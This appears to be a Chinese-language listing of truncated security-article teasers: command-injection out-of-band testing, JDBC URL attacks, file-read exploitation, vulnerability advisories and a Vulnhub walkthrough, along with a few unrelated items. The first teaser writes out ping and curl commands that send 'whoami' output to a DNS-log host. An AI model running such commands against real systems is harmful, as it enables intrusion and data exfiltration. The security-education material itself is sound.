0x01 命令执行场景 Liunx/Unix/Mac OS系统:ping `whoami`.mydnslog.comcurl http://mydnslog.com/`whoami...
图形化信息收集工具 -- myscan(1月11日更新)
===================================免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负...
JDBC Connection URL Attack
The several means of attacking java web application by manipulating MYSQL JDBC URL had been revealed...
文件读取漏洞后的深入利用姿势(建议收藏)
当我们遇到任意文件读取漏洞的时候,我们需要考虑如何通过这一个小点去扩大我们的成果,达到最大化利用的目的。本篇文章主要介绍了一些在我们拿到任意文件读取点后的深入利用姿势,希望对大家能有所帮助。来源作者l...
20个 Unix/Linux 命令技巧
这些Unix/Linux命令技巧,提高在终端下的生产力。删除一个大文件我在生产服务器上有一个很大的200GB的日志文件需要删除。我的rm和ls命令已经崩溃,我担心这是由于巨大的磁盘IO造成的,要删除这...
cby的日常(before 2022.6.20)
2022.6.17cby: 爸爸,你知道54188的意思吗?scz: 我是你爸爸cby: 咦~~~你怎么知道?scz: 我聪明呗cby: 哼!cby学习结束cby: 来,打牌吧mom: 快让我休息一下...
iPhone关机后仍可运行恶意软件
研究人员发现可在iPhone关机后运行恶意软件的新方法。 技术分析LPM(low power mode,低电量模式)特征是2021年在iOS 15中引入的新特征。iPhone关机后在LPM模式下,大多...
西部数据My Cloud修复开源服务爆严重漏洞,可被滥用劫持设备
更多全球网络安全资讯尽在邑安全西部数据发布了新的 My Cloud OS 固件,以修复漏洞猎人在 Pwn2Own 2021 黑客竞赛期间利用的漏洞,以实现远程代码执行。该漏洞被跟踪为 CVE-2022...
【漏洞通告】mySCADA myPRO 命令注入漏洞安全风险通告
点击上方蓝字关注我们!漏洞背景2022年3月26日,嘉诚安全监测到CVE官方发布了mySCADA myPRO命令注入漏洞的安全风险通告,漏洞编号为:CVE-2022-0999。mySCADA myPR...
西部数据app可导致Windows 和 macOS 提权
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士西部数据(Western Digital)的EdgeRover 桌面 app的Windows 和 Mac 版本易受提权和沙箱逃逸漏洞影响,...
【Vulnhub】靶机Me-and-My-Girlfriend-1
前言 Vulnhub刷题简单记录 Me-and-My-Girlfriend-1 描述描述:这个虚拟机告诉我们有一对恋人,爱丽丝和鲍勃,这对夫妇原本非常浪漫,但自从爱丽丝在一家私人公司“Ceban Co...
【MongoDB】基本命令使用
前言 对于MongoDB学习注入之前,先进行一些知识储备 环境-ubuntu18.04 基本启动操作MongoDB的服务启动 12service mongodb start #启动服务service ...
5